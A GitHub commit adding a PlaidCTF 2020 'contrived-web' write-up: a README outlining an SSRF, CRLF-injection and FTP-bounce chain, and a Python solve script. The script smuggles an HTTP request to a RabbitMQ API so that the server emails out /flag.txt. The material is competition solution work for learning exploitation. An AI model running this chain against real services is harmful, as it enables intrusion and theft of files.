Skip to content

Commit c39862f

Browse files
ret2jazzyret2jazzy
committed
Added contrived-web
1 parent 5318171 commit c39862f

File tree

2 files changed

+62
-0
lines changed

2 files changed

+62
-0
lines changed

2020/plaidctf-2020/contrived-web/README.md

+11
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
# Contrived-Web
2+
3+
### TL;DR
4+
5+
- SSRF in the /api/image to ftp server
6+
- CRLF injection in the username to inject ftp commands
7+
- Upload file into the ftp server using profile picture upload
8+
- Use PORT ftp command to SSRF to rabbitmq http API (use REST to discard the png header from the uploaded file)
9+
- Inject in rabbitmq email queue with an "attachment" parameter to get it to email us the flag
10+
11+

2020/plaidctf-2020/contrived-web/solve.py

+51
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
import requests
2+
import base64
3+
import urllib
4+
5+
#Joint effort by mementomori and Jazzy
6+
7+
API_URL = 'http://contrived.pwni.ng/api'
8+
AUTH = 'e8d880e6-9b42-40e9-8b11-bc79fd6c083c'
9+
10+
SSRF_HOST, SSRF_PORT = '172.32.56.72', 15672
11+
SSRF_BODY = '''POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
12+
Host: rabbit:15672
13+
Authorization: Basic dGVzdDp0ZXN0
14+
User-Agent: curl/7.52.1
15+
Accept: */*
16+
Content-Length: 336
17+
Content-Type: application/json
18+
19+
{"vhost": "/", "name": "amq.default", "properties": {"delivery_mode": 1, "headers": {}}, "routing_key": "email", "delivery_mode": "1", "payload": "{\\"text\\": \\"pepega\\", \\"to\\": \\"[email protected]\\", \\"attachments\\": [{\\"filename\\": \\"flag.txt\\", \\"path\\": \\"/flag.txt\\"}]}", "headers": {}, "props": {}, "payload_encoding": "string"}
20+
21+
'''.replace('\n', '\r\n')*800
22+
23+
PNG_HEADER = '\x89\x50\x4e\x47'
24+
25+
s = requests.Session()
26+
s.cookies.update({'authentication': AUTH})
27+
28+
def upload_avatar(contents):
29+
r = s.post(API_URL + '/profile', json = {'image': base64.b64encode(contents)})
30+
assert r.content == 'Profile updated'
31+
32+
def get_uuid():
33+
upload_avatar(PNG_HEADER)
34+
r = s.get(API_URL + '/self')
35+
return r.json()['profile'].split('/')[4]
36+
37+
def do_ssrf(host, port, body):
38+
uuid = get_uuid()
39+
upload_avatar(PNG_HEADER + body)
40+
print uuid
41+
ftp_cmds = [
42+
'PORT {},{},{}'.format(host.replace('.', ','), port >> 8, port & 0xff),
43+
'CWD user',
44+
'CWD {}'.format(uuid),
45+
'REST 4',
46+
'RETR profile.png',
47+
]
48+
url = 'ftp://anonymous%0d%0a{}:pass@ftp/'.format(urllib.quote('\r\n'.join(ftp_cmds)))
49+
r = requests.get(API_URL + '/image?url=' + urllib.quote(url))
50+
51+
do_ssrf(SSRF_HOST, SSRF_PORT, SSRF_BODY)

0 commit comments

Comments
 (0)